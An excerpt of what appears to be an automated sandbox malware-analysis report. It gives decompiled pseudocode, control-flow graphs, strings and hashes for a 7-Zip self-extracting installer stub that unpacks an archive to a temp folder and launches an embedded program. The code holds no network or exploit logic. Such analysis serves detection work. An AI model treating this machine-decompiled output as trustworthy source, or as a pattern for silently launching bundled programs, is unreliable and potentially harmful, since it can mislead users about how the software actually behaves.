                                                                                                                            control_flow_graph 0 401014-40102f call 401951 3 401031-40103d call 40b77a 0->3 4 401042-4010ce call 4143e0 call 40368d * 4 GetCommandLineW call 4036b0 call 403000 call 403204 call 40368d call 4042c1 call 403afe call 403ab3 call 403270 0->4 9 4017fe-401801 3->9 35 4010d0-4010ee call 40376e call 403afe call 403ab3 4->35 36 4010f3-40111c call 4033ad call 4019f5 4->36 12 4018c3-4018c7 9->12 35->36 46 401137-401162 call 4036f3 call 40368d 36->46 47 40111e-401121 36->47 58 401337-401352 call 40368d call 404a40 46->58 59 401168-401180 call 40e83c call 403c57 46->59 49 401123-40112a call 40b77a 47->49 50 40112f-401132 47->50 49->50 53 401885-4018be call 403204 * 6 50->53 106 4018c1 53->106 73 401354-401357 58->73 74 40136d-401377 call 4031dd 58->74 75 401182-401185 59->75 76 40119b-4011e0 call 403f77 * 3 call 4032ce 59->76 78 401365-401368 73->78 79 401359-401360 call 40b77a 73->79 96 401384 74->96 97 401379-401382 call 401987 74->97 80 401193-401196 75->80 81 401187-40118e call 40b77a 75->81 125 4011e2 76->125 126 4011e8-4011f7 call 403f46 76->126 87 40185f-401882 call 404ace call 403204 * 3 78->87 79->78 88 40124e-4012a5 call 401c64 call 403204 * 8 80->88 81->80 87->53 88->106 101 401386-401388 96->101 97->101 107 401390-401399 call 40930e 101->107 108 40138a-40138c 101->108 106->12 121 40139b-4013a7 call 40b77a 107->121 122 4013ac-4013e4 call 403740 call 40368d call 4024db 107->122 108->107 136 4014a8-4014aa 121->136 154 401462-401492 call 403204 call 40368d call 404834 call 404826 122->154 155 4013e6-4013e9 122->155 125->126 141 4011f9-401209 call 4037d2 126->141 142 40120e-401211 126->142 136->78 143 4014b0-4014b6 136->143 141->142 147 401217-40121a 142->147 148 4012aa-401332 call 403f77 call 4037d2 call 403204 call 403f77 call 4037d2 call 403204 call 403f77 call 4037d2 call 403204 * 4 call 401c64 142->148 143->78 147->148 153 401220-40122e MessageBoxW 147->153 148->58 153->148 158 401230-40124b call 403204 * 3 153->158 211 401494-4014a7 call 4018ca call 403204 154->211 212 4014bb-4014be 154->212 160 4013eb-4013ee 155->160 161 40144c-40145d call 403204 * 2 155->161 158->88 166 4013f0-4013f3 160->166 167 4013f5-401400 call 405fad 160->167 198 401794-401797 161->198 166->167 173 401405-40140a 166->173 167->173 173->161 183 40140c-40140f 173->183 190 401411-40142c call 404319 call 4037d2 call 403204 183->190 191 40142d-40144b call 405e4f MessageBoxW call 403204 183->191 190->191 191->161 202 401799-40179b 198->202 203 40179f-4017fb call 404ace call 403204 * 9 198->203 202->203 203->9 211->136 220 4014c4-4014fc call 403740 212->220 221 40161a-40161d 212->221 235 401512-401557 call 403740 ShellExecuteExW 220->235 236 4014fe-40150d call 403944 call 40399c 220->236 223 401652-4016ca call 403740 call 4055bc call 4036b0 call 403b7d call 403204 * 2 call 403740 call 4036b0 call 403b7d call 403204 221->223 224 40161f-401636 call 40376e call 405155 221->224 332 4016e0-401759 call 403632 call 403740 call 403204 CreateProcessW 223->332 333 4016cc-4016db call 40393c call 40399c 223->333 224->223 256 401638-40163b 224->256 257 401604-401615 call 403204 235->257 258 40155d-401560 235->258 236->235 262 401781-40178f call 4018ca call 403204 256->262 263 401641-40164d call 40b77a 256->263 283 401826-40182f call 403204 257->283 264 401562-401569 call 40b77a 258->264 265 40156e-401596 call 403204 * 2 call 4018ca call 403204 258->265 262->198 263->262 264->265 314 401598-40159a 265->314 315 40159e-4015ff call 404ace call 403204 * 9 265->315 298 401841-401847 call 4018ca 283->298 299 401831-40183b WaitForSingleObject CloseHandle 283->299 308 40184c-401857 call 403204 298->308 299->298 308->87 321 401859-40185b 308->321 314->315 315->12 321->87 350 401806-401823 CloseHandle call 403204 332->350 351 40175f-401762 332->351 333->332 350->283 353 401764-401767 call 401bae 351->353 354 40176c-401780 call 403204 * 2 351->354 353->354 354->262
                                                                                                                            C-Code - Quality: 90%
                                                                                                                            			E00401014(void* __eflags, intOrPtr _a4, signed int _a7) {
				signed int _v5;
				signed int _v16;
				WCHAR* _v20;
				signed int _v28;
				char _v32;
				WCHAR* _v44;
				signed int _v52;
				char _v56;
				signed int _v64;
				signed int _v68;
				char _v80;
				char _v92;
				char _v104;
				char _v116;
				char _v120;
				signed int _v128;
				char _v132;
				char _v144;
				signed int _v152;
				char _v156;
				char _v160;
				char _v172;
				char _v184;
				WCHAR* _v196;
				char _v200;
				char _v212;
				struct _STARTUPINFOW _v280;
				struct _PROCESS_INFORMATION _v296;
				void* __ebp;
				signed int _t244;
				signed int _t247;
				signed int _t251;
				signed int _t252;
				signed int _t260;
				signed int _t264;
				signed int _t287;
				int _t288;
				void* _t289;
				void* _t291;
				void* _t321;
				int _t339;
				signed int _t379;
				signed int _t383;
				signed int _t384;
				int _t398;
				void* _t491;
				void* _t530;
				void* _t547;
				intOrPtr _t548;
				signed int _t549;
				char** _t550;

				 *0x41f158 = _a4;
				if(E00401951() != 0) {
					E004143E0();
					E0040368D( &_v184);
					E0040368D( &_v32);
					E0040368D( &_v132);
					E0040368D( &_v104);
					E004036B0( &_v44, GetCommandLineW());
					E00403204(E00403000( &_v44,  &_v184,  &_v32), _v44);
					E0040368D( &_v144);
					E004042C1( &_v144);
					E00403AFE( &_v32);
					E00403AB3( &_v32);
					_a7 = 0;
					_t244 = E00403270( &_v32, "-y");
					__eflags = _t244;
					if(_t244 != 0) {
						__eflags = _v32 + 4;
						_a7 = 1;
						E0040376E( &_v32, _v32 + 4);
						E00403AFE( &_v32);
						E00403AB3( &_v32);
					}
					E004033AD( &_v156);
					_push( &_v156);
					_push(";!@InstallEnd@!");
					_t247 = E004019F5(_v144, ";!@Install@!UTF-8!", __eflags); // executed
					__eflags = _t247;
					if(_t247 != 0) {
						E004036F3( &_v172, ".\\");
						E0040368D( &_v56);
						__eflags = _v152;
						_v160 = 1;
						if(_v152 == 0) {
							L23:
							_v120 = 0;
							E0040368D( &_v116);
							_push( *0x41b1b0);
							_t251 = E00404A40( &_v120, __eflags); // executed
							__eflags = _t251;
							if(_t251 != 0) {
								_push(0x18);
								_t252 = E004031DD();
								__eflags = _t252;
								if(_t252 == 0) {
									_t549 = 0;
									__eflags = 0;
								} else {
									_t549 = E00401987(_t252);
								}
								__eflags = _t549;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t549 + 4))(_t549);
								}
								__eflags = E0040930E(_t549, __eflags);
								if(__eflags == 0) {
									E00403740( &_v92, __eflags,  &_v116);
									_v5 = 0;
									E0040368D( &_v20);
									_push( &_v20);
									_push( &_v5);
									_push(_v160);
									_push( &_v92); // executed
									_t260 = E004024DB(_t549,  &_v144, __eflags); // executed
									__eflags = _t260;
									if(_t260 == 0) {
										E00403204(_t260, _v20);
										E0040368D( &_v212);
										_v200 = 1;
										E00404834( &_v212);
										_t264 = E00404826(_v92);
										__eflags = _t264;
										if(_t264 != 0) {
											__eflags = _v128;
											if(__eflags == 0) {
												__eflags = _v52;
												if(__eflags != 0) {
													L62:
													E00403740( &_v44, __eflags,  &_v92);
													E004055BC( &_v44);
													E004036B0( &_v20, L"%%T\\");
													E00403204(E00403204(E00403B7D( &_v56,  &_v20,  &_v44), _v20), _v44);
													E00403740( &_v68, __eflags,  &_v56);
													E004036B0( &_v44, "%%T");
													E00403204(E00403B7D( &_v56,  &_v44,  &_v92), _v44);
													__eflags = _v28;
													if(__eflags != 0) {
														E0040393C();
														E0040399C( &_v56, __eflags,  &_v32);
													}
													_v280.cb = 0x44;
													_v280.lpReserved = 0;
													_v280.lpDesktop.cbSize = 0;
													_v280.lpTitle = 0;
													_v280.dwFlags = 0;
													_v280.cbReserved2 = 0;
													_v280.lpReserved2 = 0;
													E00403204(E00403740( &_v196, __eflags, E00403632( &_v80,  &_v172,  &_v56)), _v80);
													_t287 = CreateProcessW(0, _v196, 0, 0, 0, 0, 0, 0,  &_v280,  &_v296);
													__eflags = _t287;
													if(_t287 != 0) {
														_t288 = CloseHandle(_v296.hThread);
														_t547 = _v296.hProcess;
														_t289 = E00403204(_t288, _v196);
														_push(_v68);
														L74:
														E00403204(_t289);
														__eflags = _t547;
														if(_t547 != 0) {
															WaitForSingleObject(_t547, 0xffffffff);
															CloseHandle(_t547);
														}
														_t291 = E004018CA( &_v212); // executed
														E00403204(_t291, _v92);
														__eflags = _t549;
														if(_t549 != 0) {
															 *((intOrPtr*)( *_t549 + 8))(_t549);
														}
														goto L78;
													} else {
														__eflags = _a7;
														if(__eflags == 0) {
															_t287 = E00401BAE( &_v68, __eflags);
														}
														E00403204(E00403204(_t287, _v196), _v68);
														L68:
														E00403204(E004018CA( &_v212), _v92);
														L69:
														__eflags = _t549;
														if(_t549 != 0) {
															 *((intOrPtr*)( *_t549 + 8))(_t549);
														}
														E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00404ACE( &_v120), _v116), _v56), _v172), _v156), _v144), _v104), _v132), _v32), _v184);
														goto L72;
													}
												}
												E0040376E( &_v56, L"setup.exe");
												__eflags = E00405155(_v56, __eflags);
												if(__eflags != 0) {
													goto L62;
												}
												__eflags = _a7;
												if(_a7 == 0) {
													E0040B77A(0, L"Can not find setup.exe");
												}
												goto L68;
											}
											E00403740( &_v44, __eflags,  &_v132);
											__eflags = _v28;
											_v280.lpDesktop.cbSize = 0x3c;
											_v280.lpTitle = 0x140;
											_v280.dwX = 0;
											_v280.dwY = 0;
											_v280.dwXSize = _v44;
											if(__eflags != 0) {
												E00403944( &_v104);
												E0040399C( &_v104, __eflags,  &_v32);
											}
											E00403740( &_v68, __eflags,  &_v104);
											asm("sbb eax, eax");
											_t548 = 1;
											_v280.dwXCountChars = 0;
											_v280.dwYCountChars = _t548;
											_v280.hStdError = 0;
											_v280.dwYSize =  ~_v64 & _v68;
											_t339 = ShellExecuteExW( &(_v280.lpDesktop)); // executed
											__eflags = _v280.dwFillAttribute - 0x20;
											if(_v280.dwFillAttribute > 0x20) {
												_t547 = _v280.hStdError;
												_t289 = E00403204(_t339, _v68);
												_push(_v44);
												goto L74;
											} else {
												__eflags = _a7;
												if(_a7 == 0) {
													__eflags = 0;
													_t339 = E0040B77A(0, L"Can not open file");
												}
												E00403204(E00403204(_t339, _v68), _v44);
												E00403204(E004018CA( &_v212), _v92);
												__eflags = _t549;
												if(_t549 != 0) {
													 *((intOrPtr*)( *_t549 + 8))(_t549);
												}
												E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00404ACE( &_v120), _v116), _v56), _v172), _v156), _v144), _v104), _v132), _v32), _v184);
												return _t548;
											}
										}
										E00403204(E004018CA( &_v212), _v92);
										goto L46;
									}
									__eflags = _a7;
									if(_a7 != 0) {
										L43:
										E00403204(E00403204(_t260, _v20), _v92);
										goto L69;
									}
									__eflags = _t260 - 1;
									if(_t260 == 1) {
										L38:
										_t491 = 8;
										E00405FAD(_t491,  &_v20);
										_t260 = 0x80004005;
										L39:
										__eflags = _t260 - 0x80004004;
										if(_t260 != 0x80004004) {
											__eflags = _v16;
											if(__eflags == 0) {
												E00403204(E004037D2( &_v20, E00404319( &_v80, _t260, __eflags)), _v80);
											}
											_t530 = 7;
											_t260 = E00403204(MessageBoxW(0, _v20,  *(E00405E4F( &_v80, _t530)), 0x10), _v80);
										}
										goto L43;
									}
									__eflags = _v5;
									if(_v5 == 0) {
										goto L39;
									}
									goto L38;
								} else {
									E0040B77A(0, L"Can not load codecs");
									L46:
									__eflags = _t549;
									if(_t549 != 0) {
										 *((intOrPtr*)( *_t549 + 8))(_t549);
									}
									L26:
									_push(1);
									_pop(0);
									L78:
									_t247 = E00403204(E00403204(E00403204(E00404ACE( &_v120), _v116), _v56), _v172);
									_t550 =  &(_t550[3]);
									L79:
									E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(_t247, _v156), _v144), _v104), _v132), _v32), _v184);
									L80:
									return 0;
								}
							}
							__eflags = _a7;
							if(_a7 == 0) {
								__eflags = 0;
								E0040B77A(0, L"Can not create temp folder archive");
							}
							goto L26;
						}
						E0040E83C( &_v20);
						_t379 = E00403C57( &_v156,  &_v20, __eflags);
						__eflags = _t379;
						if(_t379 != 0) {
							E00403F77( &_v44,  &_v20, "Title");
							E00403F77( &_v68,  &_v20, "BeginPrompt");
							E00403F77( &_v196,  &_v20, "Progress");
							_t383 = E004032CE(_v196, "no");
							__eflags = _t383;
							if(_t383 != 0) {
								_v160 = 0;
							}
							_t384 = E00403F46( &_v20, "Directory");
							__eflags = _t384;
							if(_t384 >= 0) {
								__eflags =  *((intOrPtr*)(_v20 + _t384 * 4)) + 0xc;
								E004037D2( &_v172,  *((intOrPtr*)(_v20 + _t384 * 4)) + 0xc);
							}
							__eflags = _v64;
							if(_v64 == 0) {
								L22:
								E00403204(E004037D2( &_v56, E00403F77( &_v80,  &_v20, "RunProgram")), _v80);
								 *_t550 = "ExecuteFile";
								E00403204(E004037D2( &_v132, E00403F77( &_v80,  &_v20)), _v80);
								 *_t550 = "ExecuteParameters";
								E00403204(E00403204(E00403204(E00403204(E004037D2( &_v104, E00403F77( &_v80,  &_v20)), _v80), _v196), _v68), _v44);
								_t550 =  &(_t550[4]);
								E00401C64( &_v20);
								goto L23;
							} else {
								__eflags = _a7;
								if(_a7 != 0) {
									goto L22;
								}
								_t398 = MessageBoxW(0, _v68, _v44, 0x24);
								__eflags = _t398 - 6;
								if(_t398 == 6) {
									goto L22;
								}
								E00403204(E00403204(E00403204(_t398, _v196), _v68), _v44);
								_t550 =  &(_t550[3]);
								L21:
								E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00401C64( &_v20), _v56), _v172), _v156), _v144), _v104), _v132), _v32), _v184);
								goto L80;
							}
						}
						__eflags = _a7;
						if(_a7 == 0) {
							__eflags = 0;
							E0040B77A(0, L"Config failed");
						}
						_push(1);
						_pop(0);
						goto L21;
					}
					__eflags = _a7;
					if(_a7 == 0) {
						__eflags = 0;
						_t247 = E0040B77A(0, L"Can\'t load config info");
					}
					_push(1);
					_pop(0);
					goto L79;
				} else {
					E0040B77A(0, L"Unsupported Windows version");
					L72:
					_t321 = 1;
					return _t321;
				}
			}






















































                                                                                                                            0x00401023
                                                                                                                            0x0040102f
                                                                                                                            0x00401042
                                                                                                                            0x0040104d
                                                                                                                            0x00401055
                                                                                                                            0x0040105d
                                                                                                                            0x00401065
                                                                                                                            0x00401074
                                                                                                                            0x0040108e
                                                                                                                            0x0040109a
                                                                                                                            0x004010a5
                                                                                                                            0x004010ad
                                                                                                                            0x004010b5
                                                                                                                            0x004010c4
                                                                                                                            0x004010c7
                                                                                                                            0x004010cc
                                                                                                                            0x004010ce
                                                                                                                            0x004010d6
                                                                                                                            0x004010d9
                                                                                                                            0x004010de
                                                                                                                            0x004010e6
                                                                                                                            0x004010ee
                                                                                                                            0x004010ee
                                                                                                                            0x004010f9
                                                                                                                            0x0040110a
                                                                                                                            0x0040110b
                                                                                                                            0x00401115
                                                                                                                            0x0040111a
                                                                                                                            0x0040111c
                                                                                                                            0x00401142
                                                                                                                            0x0040114a
                                                                                                                            0x0040114f
                                                                                                                            0x0040115b
                                                                                                                            0x00401162
                                                                                                                            0x00401337
                                                                                                                            0x0040133a
                                                                                                                            0x0040133d
                                                                                                                            0x00401342
                                                                                                                            0x0040134b
                                                                                                                            0x00401350
                                                                                                                            0x00401352
                                                                                                                            0x0040136d
                                                                                                                            0x0040136f
                                                                                                                            0x00401374
                                                                                                                            0x00401377
                                                                                                                            0x00401384
                                                                                                                            0x00401384
                                                                                                                            0x00401379
                                                                                                                            0x00401380
                                                                                                                            0x00401380
                                                                                                                            0x00401386
                                                                                                                            0x00401388
                                                                                                                            0x0040138d
                                                                                                                            0x0040138d
                                                                                                                            0x00401397
                                                                                                                            0x00401399
                                                                                                                            0x004013b3
                                                                                                                            0x004013bb
                                                                                                                            0x004013be
                                                                                                                            0x004013cc
                                                                                                                            0x004013d0
                                                                                                                            0x004013d4
                                                                                                                            0x004013dc
                                                                                                                            0x004013dd
                                                                                                                            0x004013e2
                                                                                                                            0x004013e4
                                                                                                                            0x00401465
                                                                                                                            0x00401471
                                                                                                                            0x0040147c
                                                                                                                            0x00401483
                                                                                                                            0x0040148b
                                                                                                                            0x00401490
                                                                                                                            0x00401492
                                                                                                                            0x004014bb
                                                                                                                            0x004014be
                                                                                                                            0x0040161a
                                                                                                                            0x0040161d
                                                                                                                            0x00401652
                                                                                                                            0x00401659
                                                                                                                            0x00401661
                                                                                                                            0x0040166e
                                                                                                                            0x0040168e
                                                                                                                            0x0040169c
                                                                                                                            0x004016a9
                                                                                                                            0x004016c1
                                                                                                                            0x004016c6
                                                                                                                            0x004016ca
                                                                                                                            0x004016cf
                                                                                                                            0x004016db
                                                                                                                            0x004016db
                                                                                                                            0x004016ed
                                                                                                                            0x004016f7
                                                                                                                            0x004016fd
                                                                                                                            0x00401703
                                                                                                                            0x00401709
                                                                                                                            0x0040170f
                                                                                                                            0x00401716
                                                                                                                            0x00401730
                                                                                                                            0x00401751
                                                                                                                            0x00401757
                                                                                                                            0x00401759
                                                                                                                            0x0040180c
                                                                                                                            0x00401818
                                                                                                                            0x0040181e
                                                                                                                            0x00401823
                                                                                                                            0x00401826
                                                                                                                            0x00401826
                                                                                                                            0x0040182c
                                                                                                                            0x0040182f
                                                                                                                            0x00401834
                                                                                                                            0x0040183b
                                                                                                                            0x0040183b
                                                                                                                            0x00401847
                                                                                                                            0x0040184f
                                                                                                                            0x00401854
                                                                                                                            0x00401857
                                                                                                                            0x0040185c
                                                                                                                            0x0040185c
                                                                                                                            0x00000000
                                                                                                                            0x0040175f
                                                                                                                            0x0040175f
                                                                                                                            0x00401762
                                                                                                                            0x00401767
                                                                                                                            0x00401767
                                                                                                                            0x0040177a
                                                                                                                            0x00401781
                                                                                                                            0x0040178f
                                                                                                                            0x00401794
                                                                                                                            0x00401794
                                                                                                                            0x00401797
                                                                                                                            0x0040179c
                                                                                                                            0x0040179c
                                                                                                                            0x004017f6
                                                                                                                            0x00000000
                                                                                                                            0x004017fb
                                                                                                                            0x00401759
                                                                                                                            0x00401627
                                                                                                                            0x00401634
                                                                                                                            0x00401636
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00401638
                                                                                                                            0x0040163b
                                                                                                                            0x00401648
                                                                                                                            0x00401648
                                                                                                                            0x00000000
                                                                                                                            0x0040163b
                                                                                                                            0x004014cb
                                                                                                                            0x004014d3
                                                                                                                            0x004014d6
                                                                                                                            0x004014e0
                                                                                                                            0x004014ea
                                                                                                                            0x004014f0
                                                                                                                            0x004014f6
                                                                                                                            0x004014fc
                                                                                                                            0x00401501
                                                                                                                            0x0040150d
                                                                                                                            0x0040150d
                                                                                                                            0x00401519
                                                                                                                            0x00401525
                                                                                                                            0x00401527
                                                                                                                            0x0040152b
                                                                                                                            0x00401531
                                                                                                                            0x00401537
                                                                                                                            0x0040153d
                                                                                                                            0x0040154a
                                                                                                                            0x00401550
                                                                                                                            0x00401557
                                                                                                                            0x00401607
                                                                                                                            0x0040160d
                                                                                                                            0x00401612
                                                                                                                            0x00000000
                                                                                                                            0x0040155d
                                                                                                                            0x0040155d
                                                                                                                            0x00401560
                                                                                                                            0x00401567
                                                                                                                            0x00401569
                                                                                                                            0x00401569
                                                                                                                            0x00401579
                                                                                                                            0x0040158e
                                                                                                                            0x00401593
                                                                                                                            0x00401596
                                                                                                                            0x0040159b
                                                                                                                            0x0040159b
                                                                                                                            0x004015f5
                                                                                                                            0x00000000
                                                                                                                            0x004015fd
                                                                                                                            0x00401557
                                                                                                                            0x004014a2
                                                                                                                            0x00000000
                                                                                                                            0x004014a7
                                                                                                                            0x004013e6
                                                                                                                            0x004013e9
                                                                                                                            0x0040144c
                                                                                                                            0x00401457
                                                                                                                            0x00000000
                                                                                                                            0x0040145c
                                                                                                                            0x004013eb
                                                                                                                            0x004013ee
                                                                                                                            0x004013f5
                                                                                                                            0x004013fa
                                                                                                                            0x004013fb
                                                                                                                            0x00401400
                                                                                                                            0x00401405
                                                                                                                            0x00401405
                                                                                                                            0x0040140a
                                                                                                                            0x0040140c
                                                                                                                            0x0040140f
                                                                                                                            0x00401427
                                                                                                                            0x0040142c
                                                                                                                            0x00401432
                                                                                                                            0x00401446
                                                                                                                            0x0040144b
                                                                                                                            0x00000000
                                                                                                                            0x0040140a
                                                                                                                            0x004013f0
                                                                                                                            0x004013f3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040139b
                                                                                                                            0x004013a2
                                                                                                                            0x004014a8
                                                                                                                            0x004014a8
                                                                                                                            0x004014aa
                                                                                                                            0x004014b3
                                                                                                                            0x004014b3
                                                                                                                            0x00401365
                                                                                                                            0x00401365
                                                                                                                            0x00401367
                                                                                                                            0x0040185f
                                                                                                                            0x0040187d
                                                                                                                            0x00401882
                                                                                                                            0x00401885
                                                                                                                            0x004018b9
                                                                                                                            0x004018c1
                                                                                                                            0x00000000
                                                                                                                            0x004018c1
                                                                                                                            0x00401399
                                                                                                                            0x00401354
                                                                                                                            0x00401357
                                                                                                                            0x0040135e
                                                                                                                            0x00401360
                                                                                                                            0x00401360
                                                                                                                            0x00000000
                                                                                                                            0x00401357
                                                                                                                            0x0040116b
                                                                                                                            0x00401179
                                                                                                                            0x0040117e
                                                                                                                            0x00401180
                                                                                                                            0x004011a6
                                                                                                                            0x004011b6
                                                                                                                            0x004011c9
                                                                                                                            0x004011d9
                                                                                                                            0x004011de
                                                                                                                            0x004011e0
                                                                                                                            0x004011e2
                                                                                                                            0x004011e2
                                                                                                                            0x004011f0
                                                                                                                            0x004011f5
                                                                                                                            0x004011f7
                                                                                                                            0x00401205
                                                                                                                            0x00401209
                                                                                                                            0x00401209
                                                                                                                            0x0040120e
                                                                                                                            0x00401211
                                                                                                                            0x004012aa
                                                                                                                            0x004012c6
                                                                                                                            0x004012d1
                                                                                                                            0x004012e9
                                                                                                                            0x004012f4
                                                                                                                            0x00401327
                                                                                                                            0x0040132c
                                                                                                                            0x00401332
                                                                                                                            0x00000000
                                                                                                                            0x00401217
                                                                                                                            0x00401217
                                                                                                                            0x0040121a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00401229
                                                                                                                            0x0040122b
                                                                                                                            0x0040122e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00401246
                                                                                                                            0x0040124b
                                                                                                                            0x0040124e
                                                                                                                            0x0040129d
                                                                                                                            0x00000000
                                                                                                                            0x004012a2
                                                                                                                            0x00401211
                                                                                                                            0x00401182
                                                                                                                            0x00401185
                                                                                                                            0x0040118c
                                                                                                                            0x0040118e
                                                                                                                            0x0040118e
                                                                                                                            0x00401193
                                                                                                                            0x00401195
                                                                                                                            0x00000000
                                                                                                                            0x00401195
                                                                                                                            0x0040111e
                                                                                                                            0x00401121
                                                                                                                            0x00401128
                                                                                                                            0x0040112a
                                                                                                                            0x0040112a
                                                                                                                            0x0040112f
                                                                                                                            0x00401131
                                                                                                                            0x00000000
                                                                                                                            0x00401031
                                                                                                                            0x00401038
                                                                                                                            0x004017fe
                                                                                                                            0x00401800
                                                                                                                            0x00000000
                                                                                                                            0x00401800

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00401951: GetVersionExW.KERNEL32(?), ref: 0040196B
                                                                                                                            • GetCommandLineW.KERNEL32(?,?,00000000), ref: 0040106A
                                                                                                                              • Part of subcall function 0040B77A: MessageBoxW.USER32(00000000,?,7-Zip,00000010), ref: 0040B783
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CommandLineMessageVersion
                                                                                                                            • String ID: $%%T$%%T\$;!@Install@!UTF-8!$;!@InstallEnd@!$<$BeginPrompt$Can not create temp folder archive$Can not find setup.exe$Can not load codecs$Can not open file$Can't load config info$Config failed$D$Directory$Progress$RunProgram$Title$Unsupported Windows version$setup.exe
                                                                                                                            • API String ID: 1181637900-2745836148
                                                                                                                            • Opcode ID: a0069bc1b76d23120d7a9335fb8639b802b751fe182a55a2f7d8ebf9f1ac61d4
                                                                                                                            • Instruction ID: 78f7f2e9f043a6e6e6b7956f289dc4eafbfd083bebb4df73e2f95e0f672d6238
                                                                                                                            • Opcode Fuzzy Hash: a0069bc1b76d23120d7a9335fb8639b802b751fe182a55a2f7d8ebf9f1ac61d4
                                                                                                                            • Instruction Fuzzy Hash: 6F320971800119AACF15BFA2CC52AEDBF39AF04319F1084BFE515761E2DB395A89CF58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041910C Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 368 41910c-419181 __set_app_type __p__fmode __p__commode call 419297 371 419183-41918e __setusermatherr 368->371 372 41918f-4191e6 call 419282 _initterm __getmainargs _initterm 368->372 371->372 375 419222-419225 372->375 376 4191e8-4191f0 372->376 379 419227-41922b 375->379 380 4191ff-419203 375->380 377 4191f2-4191f4 376->377 378 4191f6-4191f9 376->378 377->376 377->378 378->380 381 4191fb-4191fc 378->381 379->375 382 419205-419207 380->382 383 419209-41921a GetStartupInfoA 380->383 381->380 382->381 382->383 384 41922d-41922f 383->384 385 41921c-419220 383->385 386 419230-41925d GetModuleHandleA call 401014 exit _XcptFilter 384->386 385->386
                                                                                                                            C-Code - Quality: 81%
                                                                                                                            			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x41c298);
				_push(0x419106);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x4213e4 =  *0x4213e4 | 0xffffffff;
				 *0x4213e8 =  *0x4213e8 | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x41f3c8; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x41f3c4; // 0x0
				 *_t24 = _t47;
				 *0x4213ec = _adjust_fdiv;
				_t27 = E00419297( *_adjust_fdiv);
				_t61 =  *0x41f150; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00419294);
				}
				E00419282(_t27);
				_push(0x41f038);
				_push(0x41f034);
				L0041927C();
				_t29 =  *0x41f3c0; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x41f3bc,  &_v112);
				_push(0x41f030);
				_push(0x41f000);
				L0041927C();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while(1) {
						__eflags =  *_t55 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				L7:
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t69 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E00401014(_t69, GetModuleHandleA(0), 0, _t55, _t38); // executed
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00419276();
				return _t41;
			}





























                                                                                                                            0x0041910f
                                                                                                                            0x00419111
                                                                                                                            0x00419116
                                                                                                                            0x00419121
                                                                                                                            0x00419122
                                                                                                                            0x0041912f
                                                                                                                            0x00419134
                                                                                                                            0x00419139
                                                                                                                            0x00419140
                                                                                                                            0x00419147
                                                                                                                            0x0041914e
                                                                                                                            0x00419154
                                                                                                                            0x0041915a
                                                                                                                            0x0041915c
                                                                                                                            0x00419162
                                                                                                                            0x00419168
                                                                                                                            0x00419171
                                                                                                                            0x00419176
                                                                                                                            0x0041917b
                                                                                                                            0x00419181
                                                                                                                            0x00419188
                                                                                                                            0x0041918e
                                                                                                                            0x0041918f
                                                                                                                            0x00419194
